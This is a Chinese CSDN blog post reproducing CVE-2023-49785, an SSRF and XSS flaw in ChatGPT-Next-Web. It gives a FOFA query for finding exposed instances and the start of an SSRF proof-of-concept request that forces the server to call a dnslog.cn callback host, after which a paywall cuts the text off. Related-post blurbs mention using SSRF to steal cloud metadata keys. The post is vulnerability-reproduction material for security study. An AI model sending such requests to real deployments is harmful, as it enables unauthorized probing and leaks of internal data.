ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)

已于 2024-03-14 17:55:09 修改
阅读量1.6k 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: chatgpt xss web安全
于 2024-03-14 17:54:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136717498
版权
本文详细介绍了ChatGPT-Next-Web产品中的CVE-2023-49785漏洞,该漏洞包含SSRF和XSS风险。攻击者可以利用这些漏洞获取系统内部敏感信息。复现环境中通过FOFA查询到相关应用,提供了SSRF和XSS的PoC以及Nuclei扫描脚本。修复建议包括限制接口访问权限和升级到安全版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

ChatGPT-Next-Web 是一种基于 OpenAI 的 GPT-3.5 、GPT-4.0语言模型的产品。它是设计用于 Web 环境中的聊天机器人,旨在为用户提供自然语言交互和智能对话的能力。

0x02 漏洞概述

2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS 漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。

0x03 复现环境

FOFA:app="ChatGPT-Next-Web"

0x04 漏洞复现

SSRF-PoC

GET /api/cors/http:%2f%2fnextchat.2222222222.pb0e92.dnslog.cn%23 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,applicati
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
【网络安全 | 漏洞挖掘】URL解析器混淆攻击实现ChatGPT账户接管、Glassdoor服务器XSS
等风来
02-05 1万+
通常,只有静态文件(如图片、CSS、JS文件等)会被CDN缓存,但在这个情况中,一个动态内容的生成(即ChatGPT的对话分享)也被缓存,这反映出Cloudflare的缓存机制并不仅限于传统意义上的静态文件,而是可以根据配置规则对各种类型的内容进行缓存。综上,ChatGPT的缓存规则配置为/share/*,表示所有位于/share/路径下的内容都会被CDN缓存,不管这些内容是什么类型的文件或者是否根本就不是文件(例如动态生成的内容)。ice再与ChatGPT对话,此时A访问对话链接,却看不到新的对话内容。
ChatGPT个人专用版 SSRF漏洞复现(CVE-2024-27564)
0xSec
04-10 672
ChatGPT个人专用版 pictureproxy.php 接口处存在服务器请求伪造漏洞,由于接口处没有对url参数进行校验,攻击者可以通过url参数注入任意URL让应用发出任意请求,导致系统处于极不安全状态。
CVE-2023-29489 cPanel XSS漏洞分析研究
蚁景网安学院
05-04 1880
前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。一、漏洞原理漏洞简述cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail ...
NextChat cors SSRF漏洞CVE-2023-49785
2301_80127209的博客
06-19 456
2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。tips:结合云主机的特点,可通过ssrf访问云主机元数据,例如读取AK/SK,实现云主机接管。
ChatGPT-Next-Web漏洞利用分析(CVE-2023-49785
蚁景网安学院
05-07 848
日常网上冲浪,突然粗看以为是有关Chat-GPTCVE披露出来了,但是仔细一看原来是ChatGPT-Next-Web漏洞。NextChat,也称为 ChatGPT-Next-Web,是与 ChatGPT 一起使用的跨平台聊天用户界面。 2.11.2 及之前的版本容易受到服务器端请求伪造和跨站点脚本攻击的影响。2024年3月,互联网上披露CVE-2023-49785,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
深入分析 CVE-2023-44487 HTTP2 快速重置攻击对 Nginx 的影响
2401_84466336的博客
06-17 2707
最近安全圈公布了一个利用 HTTP/2 快速重置机制进行 DDoS 攻击的 0day 漏洞,,鉴于 HTTP/2 协议已经在 Internet 上广泛使用,所以该漏洞一经发布,在业界引起广泛关注。我们介绍过,雷池 WAF 使用 Nginx 作为其代理模式下的流量转发引擎,Nginx 已经在其官网介绍了。简单来说,Nginx 作为一款久经考验的,其本身就提供过了多种方式来缓解 DDoS 攻击。:保持默认配置 1000:保持默认配置 128需要说明的是,Nginx 1.19.7 及其之后版本是通过。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1366
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Find-Sec-Bugs 漏洞范例
热门推荐
zhaohonghan的博客
04-03 1万+
Find-Sec-Bugs 漏洞范例 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
http请求走私漏洞原理,利用,检测,防护
墨痕诉清风的博客
11-24 2721
当今的web架构中,单纯的一对一客户端---服务端结构已经逐渐过时。前端服务器与后端服务器。前端服务器(例如代理服务器)负责安全控制,只有被允许的请求才能转发给后端服务器,而后端服务器无条件的相信前端服务器转发过来的全部请求,并对每一个请求都进行响应。但是在这个过程中要保证前端服务器与后端服务器的请求边界设定一致,如果前后端服务器对请求包处理出现差异,那么就可能导致攻击者通过发送一个精心构造的http请求包,绕过前端服务器的安全策略直接抵达后端服务器访问到原本禁止访问的服务或接口,这就是http请求走私。
攻防世界-web高手进阶区
zji
04-25 6650
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
2 简单xss漏洞网页搭建(失败)及移植Linux
weixin_62297109的博客
04-08 785
跨站脚本(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets)的缩写CSS混合,所以改名为XSS;攻击者会向web页面、input表单、URL、留言版等位置)插入恶意JavaScript代码,导致管理员/用户访问时触发,从而达到攻击者的目的XSS 的核心思想是在 HTML 页面中注入恶意代码。
火爆外网的ChatGPT,改Bug,敲代码不在话下
veratata的博客
12-14 4452
这几天ChatGPT AI 可谓是火的一塌糊涂,那么它到底是什么?有什么用?
ChatGPT】让ChatGPT帮助制定项目计划与任务分配
weixin_39372311的博客
11-07 1081
使用ChatGPT协助制定项目计划和任务分配,您可以实现更为细致的分工和合理的进度安排。通过明确的Prompt设计,您能够引导ChatGPT生成涵盖项目目标、任务分解、资源配置和时间安排的完整项目计划,从而有效提升项目执行的质量与效率。
【人工智能】10分钟解读-深入浅出大语言模型(LLM)——从ChatGPT到未来AI的演进
万物皆有灵
11-08 697
2022年底,OpenAI推出的聊天机器人ChatGPT一经上线,便迅速引发了全球范围内的热议与追捧。仅在上线五天内,注册用户便突破了百万大关。ChatGPT的成功不仅展示了大语言模型(LLM)的强大能力,也标志着人类正式迈入了一个全新的人工智能时代。本文将以ChatGPT为切入点,回顾GPT模型的发展历程,深入解析大语言模型(LLM)的构成及其工作原理。同时,我们将涵盖自然语言处理(NLP)、深度学习、Transformer等相关知识,帮助读者全面了解LLM及其在AI领域中的重要地位。
在VS中安装chatGPT
sinat_37300324的博客
11-01 1777
在VS中安装charGPT
ChatGPT】让ChatGPT生成产品或项目的详细方案
最新发布
weixin_39372311的博客
11-09 608
通过逐步引导,ChatGPT可以生成一个结构完整、内容详细的产品或项目方案。利用问题链条或分步Prompt的方式,可以确保方案覆盖到每个关键点,且逻辑清晰、内容丰富。无论是针对产品开发、业务拓展还是项目管理,都可以借助ChatGPT高效生成方案,为您的项目提供强有力的支持。
OpenAI大事记;GPTChatGPT参数量进化
ZJQ的博客
11-05 367
ChatGPT是从初代 GPT逐渐演变而来的。在进化的过程中,GPT系列模型的参数数量呈指数级增长,从初代GPT的1.17亿个参数,到GPT-2的15 亿个参数,再到 GPT-3的1750 亿个参数。模型越来越大,训练语料库越来越多,模型的能力也越来越强。
通过ChatGPT轻松制作个性化GPTs应用
hong161688的博客
11-07 825
在配置界面,你还可以定义GPTs的回复语气和风格。例如,你可以选择专业、幽默、简洁等风格。这将帮助GPTs在回答用户问题时更加符合用户的期望和喜好。如果你的GPTs需要与外部服务或工具进行交互,你可以添加自定义操作。例如,你可以设置GPTs在回答完问题后发送一个表情包或链接。这需要一定的编程知识或使用第三方工具来实现集成。如果你不熟悉编程,可以暂时跳过这一步。通过ChatGPT轻松制作个性化GPTs应用是一项非常有趣且富有挑战性的任务。
【AIGC】如何通过ChatGPT轻松制作个性化GPTs应用
2301_81121233的博客
11-07 1000
2. Fine-tune 模型:使用Hugging Face的Transformers库,将提供的ChatGPT预训练模型进行自定义训练,以适应您的特定应用需求。在开始之前,你需要明确你的应用的目标和目标用户。例如,你可以根据用户的输入来调整模型输出的温度(temperature),以控制响应的多样性和创造性。可以收集用户的输入和模型的输出,以便进行后续的训练和调整。确保你的应用能够处理预期的流量,并对其进行定期的安全检查和更新。随着你的应用的发展,你可能需要扩展和优化你的应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值